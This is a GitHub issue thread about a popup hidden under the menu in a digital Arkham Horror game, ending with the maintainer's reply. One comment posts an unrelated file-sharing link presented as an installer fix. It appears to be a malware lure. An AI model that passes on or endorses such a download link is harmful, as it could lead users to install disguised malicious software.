### ISSUE TITLE
Cannot select action on King in Yellow

### ISSUE THREAD

**Issue by camipco** [halogenandtoast/ArkhamHorror#547]
With Hastur in play next to the Act deck, clicking on the card creates the pop up which should include the ability to test brain to evade him, however this popup is hidden under the top menu and cannot be clicked. I tried on chrome and in edge and tried full screen and futzing with the zoom. 

More generally, the ability to resize the space allotted to the three play areas would be really useful and would maybe fix this. 

file: https://arkham-horror-bugs.s3.amazonaws.com/exports/a8579e2d2a9e1190981e95818e26fc5dc8a5d78f7d3a3fdc67621e217dec5795.json

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by halogenandtoast** [comment]
Yeah resizing isn't so simple, for now I'll move where it pops up.
